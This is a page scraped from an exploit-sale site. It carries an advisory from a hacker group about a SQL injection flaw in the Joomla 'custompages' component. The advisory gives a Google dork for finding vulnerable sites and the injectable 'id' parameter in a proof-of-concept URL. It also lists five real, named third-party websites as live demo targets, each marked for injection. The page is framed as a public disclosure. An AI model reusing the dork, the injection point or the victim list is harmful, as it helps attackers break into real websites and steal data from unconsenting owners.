0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Joomla Components custompages SQL Injection Vulnerability
================================================================================ ____ _ _ ____ _ _ ____ _ _ ___ ____ ____ |__| | | |__| |__| |__| |_/ |__] |__| |__/ | | |___ |___ | | | | | | | \_ |__] | | | \ ================================================================================ #### # Exploit Title: Joomla Components custompages SQL Injection Vulnerability # Author: KinG Of PiraTeS # GooGle+ : http://gplus.to/HouSseM # Facebook Profile: www.fb.me/cr4ck3d # Facebeook Page : www.fb.me/serial.crack # Facebeook Page : www.fb.me/Cars2Luxe # E-mail: t5r@hotmail.com / cr4ck3d@offdr5cax.dz # Web Site : www.1337day.com | www.inj3ct0rs.com # Category:: webapps # Google Dork: inurl:"index.php?option=com_custompages" # platform : php # Vendor: NA # Download : http://joomla-php.googlecode.com/files/com_php0.1alpha1-J15.tar.gz [ Maybe it is an old Version But it is Injectable ] # Version: All vErsion # Security Risk : High # Tested on: [Windows 7 Edition Intégrale 64bit ] #### ## # | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << | # | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 | # | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * Dr.55h | # | * ------> KinG Of PiraTeS * The g0bl!n <-------- * | # | ------------------------------------------------- < | ### # 1)Introduction 2)Vulnerability Description 3)Exploit >> ---------------------------------------------------------------- 1)Introduction ============== 2)Vulnerability Description =========================== U can inject SQL query/command as an input possibly via web pages. Many web pages take parameters from web user, and make SQL query to the database. Take for instance when a user login, web page that user name and password and make SQL query to the database to check if a user has valid name and password. With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else. 3)Exploit ========= http://Localhost/{Path}/index.php?option=com_custompages&cpage=member_details.php&id=-2896 [~] P0c [~] : ============ Vuln file in : http://Localhost/{Path}/index.php?option=com_custompages&cpage=member_details.php <<-----| [~] D3m0 [~] : ============= http://www.sgsitsalumni.com/index.php?option=com_custompages&cpage=member_details.php&id=2896[Inj3ct Here] http://www.hscr.cz/index.php?option=com_custompages&Itemid=4&task=oblast&oid=13[Inj3ct Here] http://www.personalpiscinas.com.br/index.php?option=com_custompages&cpage=member_details.php&id=2[Inj3ct Here] http://www.itl.co.in/index.php?option=com_custompages&cpage=member_details.php&id=2[Inj3ct Here] http://www.dmsl.co.in/index.php?option=com_custompages&cpage=member_details.php&id=2[Inj3ct Here] Many Websites are Affected On SQL inJection & Path désclosure . . . #### Peace From Algeria #### =================================**Algerians Hackers**=============================================== # Greets To : KedAns-Dz & Caddy-Dz & kalashinkov3 **All Algerians Hackers** , Kondamne , errajol ettayeb (exploit-id.com) , (1337day.com) , (Sec4ever.com) , (h4ckforu.com) , (alboraaq.com) All My Friendz: Hanixpo , Caddy-Dz , Indoushka , Jago-dz ,saoucha , BriscO-Dz Over-X , Kha&miX ,Ev!LsCr!pT_Dz , T0xic ,TrOon , Tn_Scorpion , ..others ?___? ===================================================================================================== # 0day.today [2024-07-07] #